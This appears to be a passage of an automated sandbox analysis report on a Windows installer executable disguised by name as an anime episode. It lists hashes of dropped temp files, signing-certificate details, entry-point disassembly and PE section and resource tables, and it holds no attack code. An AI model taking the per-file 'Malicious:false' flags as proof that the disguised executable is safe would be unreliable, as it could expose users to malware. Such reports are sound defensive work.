                                                                        C:\Windows\Temp\~DF9DDB831185DD61DC.TMP

                                                                        Download File
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:Composite Document File V2 Document, Cannot read section info
                                                                        Category:dropped
                                                                        Size (bytes):32768
                                                                        Entropy (8bit):1.2501246123707326
                                                                        Encrypted:false
                                                                        SSDEEP:48:+8zuas4vFXiOT50hdO6I6RLjxL3m4S26NRSc8k0SIVoZMc9d:7z1zTM8aLVL3zyREfJoZMc
                                                                        MD5:17A5479331AB427E4C172AD25EDB9C3D
                                                                        SHA1:0A19E88113A2910EBF96BA57C3FB65D92F5EC390
                                                                        SHA-256:892700FA4C3B9CFC108BA9592F19FC9CADCC29611C24BB5A398A496BFD566407
                                                                        SHA-512:587FEE6699C42D264F12AAA2FCCEFEE0E333574CAF473FA1B6C666CABA525F11D7FB35030A4EFAE9DFF85EB7D8BACF4DC90C7068E9AE31E3C67C01752D2D2E20
                                                                        Malicious:false
                                                                        Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Windows\Temp\~DF9E20465C7112796F.TMP

                                                                        Download File
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):512
                                                                        Entropy (8bit):0.0
                                                                        Encrypted:false
                                                                        SSDEEP:3::
                                                                        MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                        SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                        SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                        SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                        Malicious:false
                                                                        Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Windows\Temp\~DF9ECB2B4DC0EBC091.TMP

                                                                        Download File
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):512
                                                                        Entropy (8bit):0.0
                                                                        Encrypted:false
                                                                        SSDEEP:3::
                                                                        MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                        SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                        SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                        SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                        Malicious:false
                                                                        Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Windows\Temp\~DF9F7CE7EC407DACA3.TMP

                                                                        Download File
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):512
                                                                        Entropy (8bit):0.0
                                                                        Encrypted:false
                                                                        SSDEEP:3::
                                                                        MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                        SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                        SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                        SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                        Malicious:false
                                                                        Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Windows\Temp\~DFB60F66F35C8797A4.TMP

                                                                        Download File
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):512
                                                                        Entropy (8bit):0.0
                                                                        Encrypted:false
                                                                        SSDEEP:3::
                                                                        MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                        SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                        SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                        SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                        Malicious:false
                                                                        Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Windows\Temp\~DFB61921616780E8EB.TMP

                                                                        Download File
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):512
                                                                        Entropy (8bit):0.0
                                                                        Encrypted:false
                                                                        SSDEEP:3::
                                                                        MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                        SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                        SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                        SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                        Malicious:false
                                                                        Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Windows\Temp\~DFC99AB002EFC7E27B.TMP

                                                                        Download File
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:Composite Document File V2 Document, Cannot read section info
                                                                        Category:dropped
                                                                        Size (bytes):32768
                                                                        Entropy (8bit):1.2501246123707326
                                                                        Encrypted:false
                                                                        SSDEEP:48:+8zuas4vFXiOT50hdO6I6RLjxL3m4S26NRSc8k0SIVoZMc9d:7z1zTM8aLVL3zyREfJoZMc
                                                                        MD5:17A5479331AB427E4C172AD25EDB9C3D
                                                                        SHA1:0A19E88113A2910EBF96BA57C3FB65D92F5EC390
                                                                        SHA-256:892700FA4C3B9CFC108BA9592F19FC9CADCC29611C24BB5A398A496BFD566407
                                                                        SHA-512:587FEE6699C42D264F12AAA2FCCEFEE0E333574CAF473FA1B6C666CABA525F11D7FB35030A4EFAE9DFF85EB7D8BACF4DC90C7068E9AE31E3C67C01752D2D2E20
                                                                        Malicious:false
                                                                        Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Windows\Temp\~DFCAA487EC351E2714.TMP

                                                                        Download File
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):512
                                                                        Entropy (8bit):0.0
                                                                        Encrypted:false
                                                                        SSDEEP:3::
                                                                        MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                        SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                        SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                        SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                        Malicious:false
                                                                        Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Windows\Temp\~DFCB7D56BA10EBC3F5.TMP

                                                                        Download File
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:Composite Document File V2 Document, Cannot read section info
                                                                        Category:dropped
                                                                        Size (bytes):32768
                                                                        Entropy (8bit):1.2501246123707326
                                                                        Encrypted:false
                                                                        SSDEEP:48:+8zuas4vFXiOT50hdO6I6RLjxL3m4S26NRSc8k0SIVoZMc9d:7z1zTM8aLVL3zyREfJoZMc
                                                                        MD5:17A5479331AB427E4C172AD25EDB9C3D
                                                                        SHA1:0A19E88113A2910EBF96BA57C3FB65D92F5EC390
                                                                        SHA-256:892700FA4C3B9CFC108BA9592F19FC9CADCC29611C24BB5A398A496BFD566407
                                                                        SHA-512:587FEE6699C42D264F12AAA2FCCEFEE0E333574CAF473FA1B6C666CABA525F11D7FB35030A4EFAE9DFF85EB7D8BACF4DC90C7068E9AE31E3C67C01752D2D2E20
                                                                        Malicious:false
                                                                        Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Windows\Temp\~DFD087ABCE3F06CB52.TMP

                                                                        Download File
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:Composite Document File V2 Document, Cannot read section info
                                                                        Category:dropped
                                                                        Size (bytes):32768
                                                                        Entropy (8bit):1.2460547016397883
                                                                        Encrypted:false
                                                                        SSDEEP:48:kGzuos4vFXiKT50YxdpI6jeBS2nQRSc8k0SItZQ:Lz7/T7Co+0REfhZ
                                                                        MD5:555BC64421B0BFA3EE9723C3F23D6344
                                                                        SHA1:A90430D1C1D107F09A74F4B90996059783472D79
                                                                        SHA-256:4AC31B291A9623068DFF6CB575B57BFFB45D97C7E5E984AF0DA268A2BCE06D93
                                                                        SHA-512:4FF8485FA7822EB5D9B17BA8624E6CBB34B05B227D85A1AF1C792496175B3C75DFAF6F9D06596221372140639E325EED9B868ADFB235440B01F8AE56A4A979FB
                                                                        Malicious:false
                                                                        Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Windows\Temp\~DFD742252D1A51F1ED.TMP

                                                                        Download File
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):32768
                                                                        Entropy (8bit):0.1030546129930227
                                                                        Encrypted:false
                                                                        SSDEEP:6:xPLG7iVCnLG7iVrKOzPLHKOTrJddKceM9TEkQnBeAbGEYlIVky6l80t/:50i8n0itFzDHFTVdMceFBJGBp801
                                                                        MD5:A3DA1055B51418EA6B29726BC5666248
                                                                        SHA1:B423A2BE6E0327322F78DF864C66F753A7586161
                                                                        SHA-256:8BB9265C7940ED7D0F58E9C1055E47B8E185DA22505943C6BEAC8E1726A8F4DF
                                                                        SHA-512:6F02058DC22537A219A7B65DD4182F262D2DF32561EED60EAE5EF0EC0D5320275A32D32E8BE6201FD2FC502BB903E0E1449C5C214BFB243C9B7DF56F9D7252A6
                                                                        Malicious:false
                                                                        Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Windows\Temp\~DFDB9EF470B467BB71.TMP

                                                                        Download File
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:Composite Document File V2 Document, Cannot read section info
                                                                        Category:dropped
                                                                        Size (bytes):20480
                                                                        Entropy (8bit):1.5584159664956596
                                                                        Encrypted:false
                                                                        SSDEEP:48:f8PhruRc06WXinFT5XYxdpI6jeBS2nQRSc8k0SItZQ:ehr1pFT2Co+0REfhZ
                                                                        MD5:97A0A76E097AA4380AC58513CF1E33C3
                                                                        SHA1:EEE2F98AF2AD83976B7E99BBCE61BB1FD02BC08B
                                                                        SHA-256:55B21841BD643EADF86864A3CB6EDE1E3FAF2CABB11812B316704B4D3D4F926F
                                                                        SHA-512:B0E5C6A5F7951533201442C7A3098AB857724E73EB9DA8352E5DD0218984FE4F8E31525B1FD67642AB83D5299E47FAEC2B59248845B9C6ACB08CD71DC8964D4E
                                                                        Malicious:false
                                                                        Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Windows\Temp\~DFDD854B17AACC2689.TMP

                                                                        Download File
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):512
                                                                        Entropy (8bit):0.0
                                                                        Encrypted:false
                                                                        SSDEEP:3::
                                                                        MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                        SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                        SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                        SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                        Malicious:false
                                                                        Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Windows\Temp\~DFE77D8887AF03272A.TMP

                                                                        Download File
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):512
                                                                        Entropy (8bit):0.0
                                                                        Encrypted:false
                                                                        SSDEEP:3::
                                                                        MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                        SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                        SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                        SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                        Malicious:false
                                                                        Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Windows\Temp\~DFEADC2D32C093560B.TMP

                                                                        Download File
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:Composite Document File V2 Document, Cannot read section info
                                                                        Category:dropped
                                                                        Size (bytes):32768
                                                                        Entropy (8bit):1.2460547016397883
                                                                        Encrypted:false
                                                                        SSDEEP:48:kGzuos4vFXiKT50YxdpI6jeBS2nQRSc8k0SItZQ:Lz7/T7Co+0REfhZ
                                                                        MD5:555BC64421B0BFA3EE9723C3F23D6344
                                                                        SHA1:A90430D1C1D107F09A74F4B90996059783472D79
                                                                        SHA-256:4AC31B291A9623068DFF6CB575B57BFFB45D97C7E5E984AF0DA268A2BCE06D93
                                                                        SHA-512:4FF8485FA7822EB5D9B17BA8624E6CBB34B05B227D85A1AF1C792496175B3C75DFAF6F9D06596221372140639E325EED9B868ADFB235440B01F8AE56A4A979FB
                                                                        Malicious:false
                                                                        Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Windows\Temp\~DFECD55D4C7D2FE9EA.TMP

                                                                        Download File
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):69632
                                                                        Entropy (8bit):0.13965811588951654
                                                                        Encrypted:false
                                                                        SSDEEP:24:SqZ6BzMYsjipVvipVITbZ+S0W1VW8zgNlGpIt8+kjdMClJ5IMClmVj3m+a:xZQMdS9S2nQRSc8kP8ldpI69a
                                                                        MD5:FEB60E66969B141CE95C205B9EECAADA
                                                                        SHA1:0E4396EB204CEE7CF5FBAB8888BCDEE080E9BE26
                                                                        SHA-256:D41B06921CFDCEBF5ED2E676886D497D3C061697F75E3C200277129D6855906B
                                                                        SHA-512:6F8FF232E6A85338BA3A8FCAA1F734948E046E152215A0B634E31E4EA6DB8BFA628887CAA35A30DF772F7913CCCCEE9136F6DEC3632308DEAB81A38A20801738
                                                                        Malicious:false
                                                                        Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Windows\Temp\~DFF094CA3E398D286C.TMP

                                                                        Download File
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):512
                                                                        Entropy (8bit):0.0
                                                                        Encrypted:false
                                                                        SSDEEP:3::
                                                                        MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                        SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                        SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                        SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                        Malicious:false
                                                                        Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Windows\Temp\~DFFEDED9ABE0491E18.TMP

                                                                        Download File
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:Composite Document File V2 Document, Cannot read section info
                                                                        Category:dropped
                                                                        Size (bytes):32768
                                                                        Entropy (8bit):1.2501246123707326
                                                                        Encrypted:false
                                                                        SSDEEP:48:+8zuas4vFXiOT50hdO6I6RLjxL3m4S26NRSc8k0SIVoZMc9d:7z1zTM8aLVL3zyREfJoZMc
                                                                        MD5:17A5479331AB427E4C172AD25EDB9C3D
                                                                        SHA1:0A19E88113A2910EBF96BA57C3FB65D92F5EC390
                                                                        SHA-256:892700FA4C3B9CFC108BA9592F19FC9CADCC29611C24BB5A398A496BFD566407
                                                                        SHA-512:587FEE6699C42D264F12AAA2FCCEFEE0E333574CAF473FA1B6C666CABA525F11D7FB35030A4EFAE9DFF85EB7D8BACF4DC90C7068E9AE31E3C67C01752D2D2E20
                                                                        Malicious:false
                                                                        Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        Static File Info

                                                                        General

                                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Entropy (8bit):7.9942855302043085
                                                                        TrID:
                                                                        • Win32 Executable (generic) a (10002005/4) 98.04%
                                                                        • Inno Setup installer (109748/4) 1.08%
                                                                        • InstallShield setup (43055/19) 0.42%
                                                                        • Win32 EXE PECompact compressed (generic) (41571/9) 0.41%
                                                                        • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                                        File name:Boku no Hero Academia 6th Season - Episode 13.exe
                                                                        File size:25461096
                                                                        MD5:71eabe2172181c2e4517c30c22cb6d12
                                                                        SHA1:caaa052ae05d6032d8361e61fa22a686c6b5a392
                                                                        SHA256:147e1b5a750fbfd8863449d523e3d6d110defceb74ad9cdb7c939ab75ffa2180
                                                                        SHA512:57c46b8acbec964265095314cd3dd235840318aea5afa9c06ecb937bd677b242d8e6c3ecb9d186e9014d57e6b99a8e032f25c64289058f91982311c81ca5a1f3
                                                                        SSDEEP:393216:gmnJPDpxSBQjE7v4/Gx3OajsPk/SRSu8LrB2KNIWHzQUfUKls0p8lzOHtS:3IBQjUSq3OLk/VjLt2m1Bs0pXS
                                                                        TLSH:F847333BB2646A3EC8AB473645B3935015377B25781A8C2F6BF0450DDF6A4B01E3F64A
                                                                        File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

                                                                        File Icon

                                                                        Icon Hash:a2a0b496b2caca72

                                                                        Static PE Info

                                                                        General

                                                                        Entrypoint:0x4b5eec
                                                                        Entrypoint Section:.itext
                                                                        Digitally signed:true
                                                                        Imagebase:0x400000
                                                                        Subsystem:windows gui
                                                                        Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                        Time Stamp:0x5F5DDFC3 [Sun Sep 13 09:00:51 2020 UTC]
                                                                        TLS Callbacks:
                                                                        CLR (.Net) Version:
                                                                        OS Version Major:6
                                                                        OS Version Minor:1
                                                                        File Version Major:6
                                                                        File Version Minor:1
                                                                        Subsystem Version Major:6
                                                                        Subsystem Version Minor:1
                                                                        Import Hash:5a594319a0d69dbc452e748bcf05892e

                                                                        Authenticode Signature

                                                                        Signature Valid:true
                                                                        Signature Issuer:CN=SSL.com EV Code Signing Intermediate CA RSA R3, O=SSL Corp, L=Houston, S=Texas, C=US
                                                                        Signature Validation Error:The operation completed successfully
                                                                        Error Number:0
                                                                        Not Before, Not After
                                                                        • 10/12/2022 9:50:16 AM 10/12/2023 9:48:39 AM
                                                                        Subject Chain
                                                                        • OID.1.3.6.1.4.1.311.60.2.1.3=GB, OID.2.5.4.15=Private Organization, CN=LIMESTONE DIGITAL LIMITED, SERIALNUMBER=14347919, O=LIMESTONE DIGITAL LIMITED, L=Stoke-On-Trent, C=GB
                                                                        Version:3
                                                                        Thumbprint MD5:1902CF8D0B158DA71E552DBF8A895FE1
                                                                        Thumbprint SHA-1:2AAE66915908A703D5059DA2FCF4D5245B78BB30
                                                                        Thumbprint SHA-256:D64F03F1738A5FB5B1C02AE09BDFE0D95101530EB356CBFB323AFD7C0793502A
                                                                        Serial:4D2DC3C461FF097059BC7440DAC6207B

                                                                        Entrypoint Preview

                                                                        Instruction
                                                                        push ebp
                                                                        mov ebp, esp
                                                                        add esp, FFFFFFA4h
                                                                        push ebx
                                                                        push esi
                                                                        push edi
                                                                        xor eax, eax
                                                                        mov dword ptr [ebp-3Ch], eax
                                                                        mov dword ptr [ebp-40h], eax
                                                                        mov dword ptr [ebp-5Ch], eax
                                                                        mov dword ptr [ebp-30h], eax
                                                                        mov dword ptr [ebp-38h], eax
                                                                        mov dword ptr [ebp-34h], eax
                                                                        mov dword ptr [ebp-2Ch], eax
                                                                        mov dword ptr [ebp-28h], eax
                                                                        mov dword ptr [ebp-14h], eax
                                                                        mov eax, 004B10F0h
                                                                        call 00007FEEA49E10D5h
                                                                        xor eax, eax
                                                                        push ebp
                                                                        push 004B65E2h
                                                                        push dword ptr fs:[eax]
                                                                        mov dword ptr fs:[eax], esp
                                                                        xor edx, edx
                                                                        push ebp
                                                                        push 004B659Eh
                                                                        push dword ptr fs:[edx]
                                                                        mov dword ptr fs:[edx], esp
                                                                        mov eax, dword ptr [004BE634h]
                                                                        call 00007FEEA4A837FFh
                                                                        call 00007FEEA4A83352h
                                                                        lea edx, dword ptr [ebp-14h]
                                                                        xor eax, eax
                                                                        call 00007FEEA49F6B48h
                                                                        mov edx, dword ptr [ebp-14h]
                                                                        mov eax, 004C1D84h
                                                                        call 00007FEEA49DBCC7h
                                                                        push 00000002h
                                                                        push 00000000h
                                                                        push 00000001h
                                                                        mov ecx, dword ptr [004C1D84h]
                                                                        mov dl, 01h
                                                                        mov eax, dword ptr [004237A4h]
                                                                        call 00007FEEA49F7BAFh
                                                                        mov dword ptr [004C1D88h], eax
                                                                        xor edx, edx
                                                                        push ebp
                                                                        push 004B654Ah
                                                                        push dword ptr fs:[edx]
                                                                        mov dword ptr fs:[edx], esp
                                                                        call 00007FEEA4A83887h
                                                                        mov dword ptr [004C1D90h], eax
                                                                        mov eax, dword ptr [004C1D90h]
                                                                        cmp dword ptr [eax+0Ch], 01h
                                                                        jne 00007FEEA4A89E6Ah
                                                                        mov eax, dword ptr [004C1D90h]
                                                                        mov edx, 00000028h
                                                                        call 00007FEEA49F84A4h
                                                                        mov edx, dword ptr [004C1D90h]

                                                                        Data Directories

                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0xc40000x9a.edata
                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0xc20000xf36.idata
                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0xc70000x4800.rsrc
                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x18456f00x2a78
                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_TLS0xc60000x18.rdata
                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_IAT0xc22e40x244.idata
                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0xc30000x1a4.didata
                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                        Sections

                                                                        NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                        .text0x10000xb361c0xb3800False0.3448639341051532data6.356058204328091IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                        .itext0xb50000x16880x1800False0.544921875data5.972750055221053IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                        .data0xb70000x37a40x3800False0.36097935267857145data5.044400562007734IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                        .bss0xbb0000x6de80x0False0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                        .idata0xc20000xf360x1000False0.3681640625data4.8987046479600425IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                        .didata0xc30000x1a40x200False0.345703125data2.7563628682496506IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                        .edata0xc40000x9a0x200False0.2578125data1.8722228665884297IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                        .tls0xc50000x180x0False0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                        .rdata0xc60000x5d0x200False0.189453125data1.3838943752217987IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                        .rsrc0xc70000x48000x4800False0.3149956597222222data4.420313109581478IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                        Resources

                                                                        NameRVASizeTypeLanguageCountry
                                                                        RT_ICON0xc74c80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192DutchNetherlands
                                                                        RT_ICON0xc75f00x568Device independent bitmap graphic, 16 x 32 x 8, image size 320DutchNetherlands
                                                                        RT_ICON0xc7b580x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 640DutchNetherlands
                                                                        RT_ICON0xc7e400x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1152DutchNetherlands
                                                                        RT_STRING0xc86e80x360data
                                                                        RT_STRING0xc8a480x260data
                                                                        RT_STRING0xc8ca80x45cdata
                                                                        RT_STRING0xc91040x40cdata
                                                                        RT_STRING0xc95100x2d4data
                                                                        RT_STRING0xc97e40xb8data
                                                                        RT_STRING0xc989c0x9cdata
                                                                        RT_STRING0xc99380x374data
                                                                        RT_STRING0xc9cac0x398data
                                                                        RT_STRING0xca0440x368data
                                                                        RT_STRING0xca3ac0x2a4data
                                                                        RT_RCDATA0xca6500x10data
                                                                        RT_RCDATA0xca6600x2c4data
                                                                        RT_RCDATA0xca9240x2cdata
                                                                        RT_GROUP_ICON0xca9500x3edataEnglishUnited States
                                                                        RT_VERSION0xca9900x584dataEnglishUnited States
                                                                        RT_MANIFEST0xcaf140x726XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States

                                                                        Imports

                                                                        DLLImport
